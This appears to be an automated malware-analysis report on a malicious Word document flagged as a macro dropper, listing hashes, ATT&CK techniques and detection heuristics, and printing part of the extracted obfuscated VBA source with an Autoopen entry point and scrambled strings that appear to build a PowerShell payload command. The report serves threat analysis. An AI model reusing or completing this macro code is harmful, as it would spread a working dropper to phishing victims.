Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b26fa7e3f85d5bd8…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 126.5 KB
Created: 2018-05-03 07:14:00
Authoring application: Microsoft Office Word
First seen: 2019-10-01

MD5: 0780ca66fced4250ab5ac23e976e970a
SHA-1: 4f56abfb593661d757b094fb44d9600a37d4554c
SHA-256: b26fa7e3f85d5bd8ccca12d893dea59e60bca6bbdf035a2cc516c5da51d00d9a

Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The critical OLE_VBA_SHELL heuristic fired on this sample, indicating a Shell() call within its VBA macros. An Autoopen macro is also present, which is a common entry point for malicious execution in Office documents. The ClamAV detection name 'Doc.Dropper.Agent-6528739-0' further suggests that the document functions as a dropper. The VBA script is heavily obfuscated, but together these indicators strongly suggest it is designed to download and execute a secondary payload.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6528739-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6528739-0
  • VBA macros detected (severity: medium; 2 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  115258 bytes
SHA-256: 50362d8e818c2962921d65ec915df21b9524a79b9fa5b4d473c5808cd98f9456

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ujDjvvQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub jpiWVs(tssPw)
twzSX = 89948 * CByte(bcDtOn)
            wvGHf = Int(92496) - Oct(30921 - 82308 * TYNLPB)
            YCFNn = 98570 * CByte(NSkFX)
End Sub
Sub moIif(zlkkA)
CSduJj = 40580 * CByte(airIZY)
            Wtpurs = Int(69110) - Oct(85177 - 59458 * ffuDQ)
            RFXlhv = 35999 * CByte(AjzjH)
zIHYas = 90646 * CByte(JzSZwi)
            EaWKqZ = Int(7137) - Oct(4275 - 75677 * bajuH)
            DkhQWX = 42676 * CByte(YtcvaS)
woivJ = 50997 * CByte(RYvGU)
            zROvC = Int(4280) - Oct(29548 - 79080 * OIhEt)
            wzHcVI = 58631 * CByte(CwzUjT)
End Sub
Sub UQDNd(ijtXC)
faWOE = 63179 * CByte(Uboizz)
            iMzEh = Int(66465) - Oct(42244 - 15837 * rdqQfR)
            NESqw = 24166 * CByte(jtnwwi)
mEOIcS = 68588 * CByte(qUwXji)
            NQFDKa = Int(49868) - Oct(63584 - 18316 * RfNKt)
            XaMFZc = 14049 * CByte(zjXNz)
End Sub
Sub Autoopen()
On Error Resume Next
bfBwfX = 82635 * CByte(XGMXEm)
            mVfwi = Int(47288) - Oct(94569 - 38523 * LlJCD)
            CMjPum = 57434 * CByte(iWvcC)
TiOoQjQV (tCXUs + nFODYizhYv + KsQPV)
LdmuNo = 83371 * CByte(DznpsX)
            GAamw = Int(89143) - Oct(25867 - 59843 * NoJrT)
            vTuQa = 1176 * CByte(kIGlJC)
End Sub
Sub OicUDE(qcZjww)
hYfzau = 8937 * CByte(vbzIi)
            SjLlK = Int(72224) - Oct(89795 - 58644 * ooORF)
            UjcCzD = 69137 * CByte(liIoun)
XuacY = 93628 * CByte(wnMiC)
            rKLdz = Int(56051) - Oct(50226 - 91202 * GiMiF)
            CCwAq = 22727 * CByte(uoohu)
hopQA = 45545 * CByte(aWfpRN)
            CovPq = Int(83574) - Oct(77562 - 92899 * PiMAaQ)
            oSiTN = 62233 * CByte(OMKVz)
End Sub
Sub WHidGO(tYrCS)
DZhoXI = 18955 * CByte(qXiur)
            YjDfV = Int(79269) - Oct(32261 - 27959 * zitML)
            QbjAcc = 81113 * CByte(YnMpfj)
End Sub

Attribute VB_Name = "AiPrhNVLjdUo"
Sub hFdww(awCtO)
izfsJz = 71683 * CByte(YzAiUi)
            vPzXH = Int(77256) - Oct(48197 - 98472 * JQqIF)
            wpAwwN = 80667 * CByte(XdjGs)
End Sub
Function nFODYizhYv()
On Error Resume Next
HaPTn = 36440 * CByte(cGdhi)
            AqKKP = Int(78184) - Oct(38288 - 29334 * FjYvSt)
            GJKXZG = 1995 * CByte(GZUcj)
ZPmwhk = OUtvU("2Zt m0'+'IFd'+'aOIm0l'+'nWIm0'+'oD6Hs.UYYImZ{yr'+'t{)XC'+'DA'+'ImZ ni'+' '+'cfs0P", 15852 - 15852 + 3 + 15852 - 15852, 15852 - 15852 + 75 + 15852 - 15852)
WhfhX = 81953 * CByte(miBYG)
            VjusA = Int(35142) - Oct(83564 - 99893 * XKzup)
            DqUrjQ = 67542 * CByte(tOvDNU)
FRslq = 61262 * CByte(zlJEtb)
            mMAtAl = Int(87272) - Oct(69941 - 63332 * ujFml)
            GUuQYB = 19228 * CByte(vJwSHU)
wzhDTIr = OUtvU("hCuaIm'+'Z('+'hcaef1X", 58571 - 58571 + 4 + 58571 - 58571, 58571 - 58571 + 15 + 58571 - 58571)
KjEbiO = 91561 * CByte(JPVkc)
            KatNLC = Int(70207) - Oct(98517 - 19907 * lCIwqp)
            cMZjwB = 21446 * CByte(LLIkB)
GVJwk = 27979 * CByte(RMchkp)
            Nmtip = Int(96059) - Oct(90130 - 24097 * rOovTc)
            VsaGQA = 26772 * CByte(dYjvw)
jtvVYiCw = OUtvU("HUfis'+'a'+'d'+'as6m.Qb", 6267 - 6267 + 6 + 6267 - 6267, 6267 - 6267 + 14 + 6267 - 6267)
wIiKG = 13466 * CByte(vnzWu)
            SkvSNp = Int(52822) - Oct(14566 - 78553 * jjNYm)
            QOwOL = 90898 * CByte(GlNVi)
fpdjYh = 44771 * CByte(faDAsl)
            jEZYn = Int(40218) - Oct(8761 - 25728 * PpHzji)
            BXwiA = 92355 * CByte(SMAqHD)
pEplszjZYw = OUtvU("2@1Vr'+'of;)63ge6'+'3g+'+'63gxe.'+'6'+'3'+'g( '+'+ BSNI'+'mZ '+'+ 63gfcD6'+'3g + c'+'i'+'lb'+'up:vn'+'eImZ ='+vKnq", 49606 - 49606 + 5 + 49606 - 49606, 49606 - 49606 + 106 + 49606 - 49606)
XYOpG = 1413 * CByte(DXYab)
            TjZZz = Int(94541) - Oct(12389 - 2273 * vDWkOH)
            niwKF = 83794 * CByte(tIZhv)
GrELj = 55188 * CByte(bWThzL)
      
... (truncated)